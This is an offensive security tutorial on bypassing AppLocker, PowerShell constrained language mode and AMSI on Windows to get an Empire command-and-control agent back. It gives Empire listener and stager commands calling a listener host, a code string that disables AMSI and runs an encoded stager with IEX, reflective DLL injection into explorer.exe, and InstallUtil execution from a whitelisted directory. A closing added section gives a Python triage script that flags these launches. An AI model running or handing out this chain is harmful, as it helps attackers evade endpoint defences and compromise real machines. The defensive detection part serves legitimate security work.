# Bypassing AppLocker and PowerShell constrained language mode

## Using Reflective Injection and Certutil

This technique packs everything together several times to get past each security mechanism in turn. I based it on the [awesome article](https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell) from Improsec called "Babushka dolls" and on elements of its GitHub project.

**Edit: Sadly, from Windows 10 1803 onwards this trick no longer bypasses AMSI. AMSI now uses `AmsiScanBuffer` instead of the previously used `AmsiScanString`.**

### Generating listener and stager in Empire

Set up a listener and generate a stager. I've put all the commands below for easy copy and paste.

```
./Empire
listeners
uselistener
set Host 10.0.0.15
set Port 80
execute
back
usestager multi/launcher
set Listener http
generate
```

![](/files/-LOD_3E5oZbBiam86Usz)

![](/files/-LOD_FcPV9CfcXV1Ysrf)

### ReflectivePick with Visual Studio

We are now going to write the stager we generated into the ReflectivePick project.

Open the [PowerPick project](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/ReflectivePick) in VS. It may be necessary to set the target platform to x64: Project -> ReflectivePick properties -> Configuration Manager -> Platform.

![](/files/-LOD_liPhVHEZeggXmID)

Add the base64 from the stager where appropriate.

![](/files/-LODcGVNblBIAxcrDenT)

```
wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug
```

The `Out-File` part writes the decoded stager to disk for demonstration purposes. You can remove it if you wish.

Compile the DLL to `ReflectivePick_x64.dll`.

![](/files/-LODf-HZXVW3eFGYl_fP)

### Execution

We can now try to run the DLL with `rundll32.exe .\ReflectivePick_x64.dll,Void`, but as you will soon discover, AMSI picks up the Empire stager at runtime.

![](/files/-LODZ1XSgrRpZIF06LAN)

Disable AMSI, however, and you get an agent back.

![](/files/-LODe9pxMld_vegJdkV2)

You can also view the Base64-decoded stager payload in `C:\Windows\Tasks\out.txt`.

![](/files/-LODePJSbSFDjIoupDUL)

We can't rely on AMSI being disabled manually, so we are going to run the payload through a few more hoops.

### Load the DLL into another process

To avoid creating a new process and loading the non-whitelisted DLL from disk, we are going to reflectively inject it into an existing process using [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1).

Use the following commands in PowerShell to Base64-encode the DLL and write the result to a file. Don't worry if the commands take a few seconds to run. I have also noticed that PowerShell adds a newline at the bottom of the file when Base64-encoding like this, so remove it manually if it is present.

```
$Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
$Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\dll.txt"
```

![](/files/-LODhGGB3nJcqsyrJmmW)

Now download [Invoke-ReflectivePEInjection](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) to the working directory and open it in a text editor. At the bottom of the file, add the following lines, pasting the contents of `dll.txt` into the `$dllData` variable. This makes the script reflectively inject the DLL into the `explorer.exe` process when it runs.

```
$dllData = "DLLBASE64_GOES_HERE"
$ProcId = (Get-Process explorer).Id
$Bytes = [System.Convert]::FromBase64String($dllData)
Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId
```

![](/files/-LOEFcB-T-DY2VNgVNmI)

### Compile to an EXE using VS

In PowerShell, Base64-encode the entire script. Remove the newline at the bottom of the output file if present.

```
$Content = Get-Content .\Invoke-ReflectivePEInjection.ps1 -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
$Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\pe.txt"
```

![](/files/-LODkjnLAmWMt8VGDQ_f)

Open the [Bypass project](https://github.com/MortenSchenk/Babuska-Dolls/tree/master/Bypass) in VS and paste the Base64 into the encoded variable. Compile to `Bypass.exe` with VS.

![](/files/-LOEFShMYmaq_sUFqaaS)

### Final execution

Use `installutil.exe` or a similar [LOLBin](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LOLBins.md) to execute `Bypass.exe`. If AppLocker is present, execute it from a whitelisted directory such as `C:\Windows\Tasks`.

```
C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe 
```

![](/files/-LOEE91ztrMVlzoHbpq-)

![](/files/-LOEEH5P2ObycOZP5-cM)

Thrilling! We bypassed both AppLocker and PowerShell constrained language mode and got an Empire agent back.
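From the defender's side, the two process launches this chain relies on are conspicuous: `InstallUtil.exe /U` pointed at an executable in a user-writable directory that default AppLocker rules still allow (such as `C:\Windows\Tasks`), and `rundll32.exe` loading a DLL from outside the system directories. The following added triage example (not part of the original post or the tools it references) runs those two checks over constructed Sysmon Event ID 1 style records; the sample events, the directory lists and all function names are assumptions made for the example.

```python
# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# They are sample data for this example, not captured logs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe .\ReflectivePick_x64.dll,Void"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /i C:\Program Files\Vendor\Service.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# Directories under C:\Windows that standard users can write to yet default
# AppLocker path rules allow; C:\Windows\Tasks is the one used on this page.
WRITABLE_ALLOWED_DIRS = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\windows\\tracing\\")
# Where rundll32 is normally expected to load its DLL from.
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def installutil_finding(cmdline):
    """Flag InstallUtil /U (uninstall) run against an .exe in a writable allowed
    directory: /U executes the assembly's uninstaller code with nothing installed."""
    args = cmdline.lower().split()
    if "/u" not in args:
        return None
    for arg in args[1:]:
        if arg.endswith(".exe") and arg.startswith(WRITABLE_ALLOWED_DIRS):
            return f"InstallUtil /U executing assembly from writable allowed dir: {arg}"
    return None


def rundll32_finding(cmdline):
    """Flag rundll32 loading a DLL given by a relative path or from outside the
    trusted system directories (e.g. '.\\ReflectivePick_x64.dll,Void')."""
    parts = cmdline.split(maxsplit=1)
    if len(parts) < 2:
        return None
    dll = parts[1].split(",")[0].strip().lower()   # "path,Export" -> path
    if not dll.startswith(TRUSTED_DLL_DIRS):
        return f"rundll32 loading DLL outside trusted system dirs: {dll}"
    return None


def triage(events):
    """Return one finding string per suspicious event, in input order."""
    findings = []
    for ev in events:
        image = ev["Image"].lower()
        finding = None
        if image.endswith("\\installutil.exe"):
            finding = installutil_finding(ev["CommandLine"])
        elif image.endswith("\\rundll32.exe"):
            finding = rundll32_finding(ev["CommandLine"])
        if finding:
            findings.append(finding)
    return findings
```

Against the sample events, only the first two records are flagged; the legitimate `/i` install from Program Files and the `shell32.dll` control panel launch pass through.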

